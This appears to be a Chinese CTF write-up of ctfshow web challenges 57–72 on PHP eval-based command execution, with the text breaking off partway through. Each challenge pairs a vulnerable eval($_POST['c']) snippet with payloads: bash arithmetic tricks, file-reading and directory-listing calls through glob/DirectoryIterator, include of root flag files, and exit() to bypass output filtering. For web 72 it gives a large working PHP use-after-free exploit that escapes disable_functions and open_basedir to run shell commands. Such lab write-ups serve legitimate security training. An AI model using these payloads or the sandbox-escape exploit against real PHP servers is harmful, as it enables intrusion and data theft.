<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">echo $&#123;_&#125; #返回上一次的执行结果</span><br><span class="line">echo $(()) #0</span><br><span class="line">echo $((~$(()))) #~0是-1</span><br><span class="line">$(($((~$(())))$((~$(()))))) #$((-1-1))即$$((-2))是-2</span><br><span class="line">echo $((~-37)) #~-37是36</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$(($((~$(())))$((~$(())))))==-2 //$((~$(())))==-1 中间有两个所以是-2 是相加的</span><br></pre></td></tr></table></figure>

<p>那-37就需要中间有37个<code>$((~$(())))</code></p>
<p>然后取反就是36</p>
<p>playload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h1 id="web-58"><a href="#web-58" class="headerlink" title="web 58"></a>web 58</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 你们在炫技吗？</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">        <span class="variable">$c</span>= <span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码-6"><a href="#一-分析代码-6" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p>如果一次传入多个参数，那么 isset() 只有在全部参数都被设置时返回 TRUE，计算过程从左至右，中途遇到没有设置的变量时就会立即停止。</p>
<p>如果指定变量存在且不为 NULL，则返回 TRUE，否则返回 FALSE。</p>
<p>经过测试它在后端开启了disable_functions禁用了system exec popen passthru</p>
<h2 id="二-解题思路：-26"><a href="#二-解题思路：-26" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>使用读文件函数拿flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">file_get_contents()</span><br><span class="line">highlight_file()</span><br><span class="line">show_source()</span><br><span class="line">fgets()</span><br><span class="line">file()</span><br><span class="line">readfile()</span><br></pre></td></tr></table></figure>

<p>构造playload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c=show_source(&#x27;flag.php&#x27;);</span><br></pre></td></tr></table></figure>

<h1 id="web-59"><a href="#web-59" class="headerlink" title="web 59"></a>web 59</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 你们在炫技吗？</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">        <span class="variable">$c</span>= <span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码-7"><a href="#一-分析代码-7" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p>过滤了更多的函数</p>
<p>但是还可以用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">highlight_file()</span><br><span class="line">show_source()</span><br><span class="line">fgets()</span><br><span class="line">file()</span><br></pre></td></tr></table></figure>

<h2 id="二-解题思路：-27"><a href="#二-解题思路：-27" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>playload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c=show_source(&quot;flag.php&quot;);</span><br></pre></td></tr></table></figure>

<p>其他payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">//在源代码</span><br><span class="line">c=$a=fopen(&quot;flag.php&quot;,&quot;r&quot;);while (!feof($a)) &#123;$line = fgets($a);echo $line;&#125;</span><br><span class="line">c=$a=fopen(&quot;flag.php&quot;,&quot;r&quot;);while (!feof($a)) &#123;$line = fgetc($a);echo $line;&#125;</span><br><span class="line">c=$a=fopen(&quot;flag.php&quot;,&quot;r&quot;);while (!feof($a)) &#123;$line =fgetcsv($a);print_r($line);&#125;</span><br><span class="line">c=$a=fopen(&quot;flag.php&quot;,&quot;r&quot;);echo fread($a,&quot;1000&quot;);</span><br><span class="line">c=$a=fopen(&quot;flag.php&quot;,&quot;r&quot;);echo fpassthru($a);</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h1 id="web-60"><a href="#web-60" class="headerlink" title="web 60"></a>web 60</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">// 你们在炫技吗？</span><br><span class="line">if(isset($_POST[&#x27;c&#x27;]))&#123;</span><br><span class="line">        $c= $_POST[&#x27;c&#x27;];</span><br><span class="line">        eval($c);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码-8"><a href="#一-分析代码-8" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p>同时也是过滤了函数</p>
<h2 id="二-解题思路：-28"><a href="#二-解题思路：-28" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>Web58 payload 通杀</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c=show_source(<span class="string">&quot;flag.php&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>奇淫技巧：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#通过复制，重命名读取php文件内容  </span><br><span class="line">copy(&quot;flag.php&quot;,&quot;flag.txt&quot;);         </span><br><span class="line">rename(&quot;flag.php&quot;,&quot;flag.txt&quot;);</span><br><span class="line">#访问flag.txt </span><br></pre></td></tr></table></figure>



<h1 id="web-61-65"><a href="#web-61-65" class="headerlink" title="web 61-65"></a>web 61-65</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line">// 你们在炫技吗？</span><br><span class="line">if(isset($_POST[&#x27;c&#x27;]))&#123;</span><br><span class="line">        $c= $_POST[&#x27;c&#x27;];</span><br><span class="line">        eval($c);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码-9"><a href="#一-分析代码-9" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p>禁用某些函数，但是并不影响show_source</p>
<h2 id="二-解题思路：-29"><a href="#二-解题思路：-29" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>Web58和Web60 payload 通杀</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c=show_source(<span class="string">&quot;flag.php&quot;</span>);</span><br></pre></td></tr></table></figure>

<h1 id="web-66-67"><a href="#web-66-67" class="headerlink" title="web 66-67"></a>web 66-67</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 你们在炫技吗？</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">        <span class="variable">$c</span>= <span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码-10"><a href="#一-分析代码-10" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p>flag的位置变到了根目录</p>
<p>show_source()函数被禁用了换成highlight_file()</p>
<h2 id="二-解题思路：-30"><a href="#二-解题思路：-30" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">c=print_r(scandir(&quot;/&quot;)); #查看根目录文件 print_r被过滤可以换var_dump</span><br><span class="line"># 注意根目录是flag.txt</span><br><span class="line">c=highlight_file(&quot;/flag.txt&quot;);</span><br></pre></td></tr></table></figure>





<h1 id="web-68"><a href="#web-68" class="headerlink" title="web 68"></a>web 68</h1><h2 id="一-分析代码-11"><a href="#一-分析代码-11" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p>读文件的所有函数都不能用了</p>
<h2 id="二-解题思路：-31"><a href="#二-解题思路：-31" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">c=var_dump(scandir(&quot;/&quot;)); # flag还是在根目录下</span><br><span class="line"># 利用文件包含inculde()读取flag</span><br><span class="line">c=include(&quot;/flag.txt&quot;);</span><br></pre></td></tr></table></figure>







<h1 id="web-69-70"><a href="#web-69-70" class="headerlink" title="web 69-70:"></a>web 69-70:</h1><h2 id="一-分析代码-12"><a href="#一-分析代码-12" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p>var_dump()函数被ban，那就用var_export()函数</p>
<h2 id="二-解题思路：-32"><a href="#二-解题思路：-32" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><h3 id="方法一：-10"><a href="#方法一：-10" class="headerlink" title="方法一："></a>方法一：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">c=var_export(scandir(&#x27;/&#x27;));</span><br><span class="line">c=include(&#x27;/flag.txt&#x27;);</span><br></pre></td></tr></table></figure>

<h3 id="方法二：-10"><a href="#方法二：-10" class="headerlink" title="方法二："></a>方法二：</h3><p>使用遍历数组</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># 多种遍历数组姿势</span><br><span class="line"># 1</span><br><span class="line">c=$a=scandir(&quot;/&quot;);foreach($a as $value)&#123;echo $value.&quot;---&quot;;&#125;</span><br><span class="line"># 2 glob() 函数返回匹配指定模式的文件名或目录。返回的是数组</span><br><span class="line">c=$a=glob(&quot;/*&quot;);foreach($a as $value)&#123;echo $value.&quot;   &quot;;&#125;</span><br><span class="line"># 3 </span><br><span class="line">c=$a=new DirectoryIterator(&#x27;glob:///*&#x27;);foreach($a as $f)&#123;echo($f-&gt;__toString().&quot; &quot;);&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c=include(&quot;/flag.txt&quot;);</span><br></pre></td></tr></table></figure>



<h1 id="web-71"><a href="#web-71" class="headerlink" title="web 71"></a>web 71</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">ini_set(<span class="string">&#x27;display_errors&#x27;</span>, <span class="number">0</span>);</span><br><span class="line"><span class="comment">// 你们在炫技吗？</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">        <span class="variable">$c</span>= <span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">        <span class="variable">$s</span> = ob_get_contents();</span><br><span class="line">        ob_end_clean();</span><br><span class="line">        <span class="keyword">echo</span> preg_replace(<span class="string">&quot;/[0-9]|[a-z]/i&quot;</span>,<span class="string">&quot;?&quot;</span>,<span class="variable">$s</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">你要上天吗？</span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码-13"><a href="#一-分析代码-13" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$s = ob_get_contents();//得到缓冲区的数据。</span><br><span class="line">ob_end_clean();//会清除缓冲区的内容，并将缓冲区关闭，但不会输出内容</span><br></pre></td></tr></table></figure>

<h2 id="二-解题思路：-33"><a href="#二-解题思路：-33" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p><code>c=var_export(scandir(&#39;/&#39;));</code>发现输出的一大堆问号，原来是源码中用函数将缓冲区的所有字符全部替换为问号，那么可以用<code>exit()/die()</code>提前结束，这样就不会将字符替换为问号</p>
<p>由于清空输出缓冲区 传入的命令也就无法执行 这里要做的就是把代码终止在清空输出缓冲区之前使用exit()强制退出</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">c=var_export(scandir(&#x27;/&#x27;));exit();</span><br><span class="line"># flag.txt 在根目录下</span><br><span class="line">c=include(&#x27;/flag.txt&#x27;);exit();</span><br></pre></td></tr></table></figure>









<h1 id="web-72"><a href="#web-72" class="headerlink" title="web 72"></a>web 72</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">ini_set(<span class="string">&#x27;display_errors&#x27;</span>, <span class="number">0</span>);</span><br><span class="line"><span class="comment">// 你们在炫技吗？</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">        <span class="variable">$c</span>= <span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">        <span class="variable">$s</span> = ob_get_contents();</span><br><span class="line">        ob_end_clean();</span><br><span class="line">        <span class="keyword">echo</span> preg_replace(<span class="string">&quot;/[0-9]|[a-z]/i&quot;</span>,<span class="string">&quot;?&quot;</span>,<span class="variable">$s</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">你要上天吗？</span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码-14"><a href="#一-分析代码-14" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p>存在open_basedir，利用glob伪协议在筛选目录时不受open_basedir制约</p>
<h2 id="二-解题思路：-34"><a href="#二-解题思路：-34" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>注：POST不会自动进行URL编码，需手动使用URL编码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">c=</span><br><span class="line">$a=new DirectoryIterator(&quot;glob:///*&quot;);</span><br><span class="line">foreach($a as $f)&#123;</span><br><span class="line">echo $f.&quot;    &quot; ;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">exit();</span><br></pre></td></tr></table></figure>

<p>关于DirectoryIterator：<a target="_blank" rel="noopener" href="https://www.ziruchu.com/art/286">https://www.ziruchu.com/art/286</a></p>
<p>知道了文件是/flag0.txt之后，就要想办法绕过open_basedir和disable_functions来读了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br></pre></td><td class="code"><pre><span class="line">c=?&gt;&lt;?php</span><br><span class="line">pwn(&quot;ls /;cat /flag0.txt&quot;);</span><br><span class="line"> </span><br><span class="line">function pwn($cmd) &#123;</span><br><span class="line">    global $abc, $helper, $backtrace;</span><br><span class="line">    class Vuln &#123;</span><br><span class="line">        public $a;</span><br><span class="line">        public function __destruct() &#123; </span><br><span class="line">            global $backtrace; </span><br><span class="line">            unset($this-&gt;a);</span><br><span class="line">            $backtrace = (new Exception)-&gt;getTrace(); # ;)</span><br><span class="line">            if(!isset($backtrace[1][&#x27;args&#x27;])) &#123; # PHP &gt;= 7.4</span><br><span class="line">                $backtrace = debug_backtrace();</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    class Helper &#123;</span><br><span class="line">        public $a, $b, $c, $d;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function str2ptr(&amp;$str, $p = 0, $s = 8) &#123;</span><br><span class="line">        $address = 0;</span><br><span class="line">        for($j = $s-1; $j &gt;= 0; $j--) &#123;</span><br><span class="line">            $address &lt;&lt;= 8;</span><br><span class="line">            $address |= ord($str[$p+$j]);</span><br><span class="line">        &#125;</span><br><span class="line">        return $address;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function ptr2str($ptr, $m = 8) &#123;</span><br><span class="line">        $out = &quot;&quot;;</span><br><span class="line">        for ($i=0; $i &lt; $m; $i++) &#123;</span><br><span class="line">            $out .= sprintf(&#x27;%c&#x27;,$ptr &amp; 0xff);</span><br><span class="line">            $ptr &gt;&gt;= 8;</span><br><span class="line">        &#125;</span><br><span class="line">        return $out;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function write(&amp;$str, $p, $v, $n = 8) &#123;</span><br><span class="line">        $i = 0;</span><br><span class="line">        for($i = 0; $i &lt; $n; $i++) &#123;</span><br><span class="line">            $str[$p + $i] = sprintf(&#x27;%c&#x27;,$v &amp; 0xff);</span><br><span class="line">            $v &gt;&gt;= 8;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function leak($addr, $p = 0, $s = 8) &#123;</span><br><span class="line">        global $abc, $helper;</span><br><span class="line">        write($abc, 0x68, $addr + $p - 0x10);</span><br><span class="line">        $leak = strlen($helper-&gt;a);</span><br><span class="line">        if($s != 8) &#123; $leak %= 2 &lt;&lt; ($s * 8) - 1; &#125;</span><br><span class="line">        return $leak;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function parse_elf($base) &#123;</span><br><span class="line">        $e_type = leak($base, 0x10, 2);</span><br><span class="line"> </span><br><span class="line">        $e_phoff = leak($base, 0x20);</span><br><span class="line">        $e_phentsize = leak($base, 0x36, 2);</span><br><span class="line">        $e_phnum = leak($base, 0x38, 2);</span><br><span class="line"> </span><br><span class="line">        for($i = 0; $i &lt; $e_phnum; $i++) &#123;</span><br><span class="line">            $header = $base + $e_phoff + $i * $e_phentsize;</span><br><span class="line">            $p_type  = leak($header, 0, 4);</span><br><span class="line">            $p_flags = leak($header, 4, 4);</span><br><span class="line">            $p_vaddr = leak($header, 0x10);</span><br><span class="line">            $p_memsz = leak($header, 0x28);</span><br><span class="line"> </span><br><span class="line">            if($p_type == 1 &amp;&amp; $p_flags == 6) &#123; # PT_LOAD, PF_Read_Write</span><br><span class="line">                # handle pie</span><br><span class="line">                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;</span><br><span class="line">                $data_size = $p_memsz;</span><br><span class="line">            &#125; else if($p_type == 1 &amp;&amp; $p_flags == 5) &#123; # PT_LOAD, PF_Read_exec</span><br><span class="line">                $text_size = $p_memsz;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"> </span><br><span class="line">        if(!$data_addr || !$text_size || !$data_size)</span><br><span class="line">            return false;</span><br><span class="line"> </span><br><span class="line">        return [$data_addr, $text_size, $data_size];</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function get_basic_funcs($base, $elf) &#123;</span><br><span class="line">        list($data_addr, $text_size, $data_size) = $elf;</span><br><span class="line">        for($i = 0; $i &lt; $data_size / 8; $i++) &#123;</span><br><span class="line">            $leak = leak($data_addr, $i * 8);</span><br><span class="line">            if($leak - $base &gt; 0 &amp;&amp; $leak - $base &lt; $data_addr - $base) &#123;</span><br><span class="line">                $deref = leak($leak);</span><br><span class="line">                # &#x27;constant&#x27; constant check</span><br><span class="line">                if($deref != 0x746e6174736e6f63)</span><br><span class="line">                    continue;</span><br><span class="line">            &#125; else continue;</span><br><span class="line"> </span><br><span class="line">            $leak = leak($data_addr, ($i + 4) * 8);</span><br><span class="line">            if($leak - $base &gt; 0 &amp;&amp; $leak - $base &lt; $data_addr - $base) &#123;</span><br><span class="line">                $deref = leak($leak);</span><br><span class="line">                # 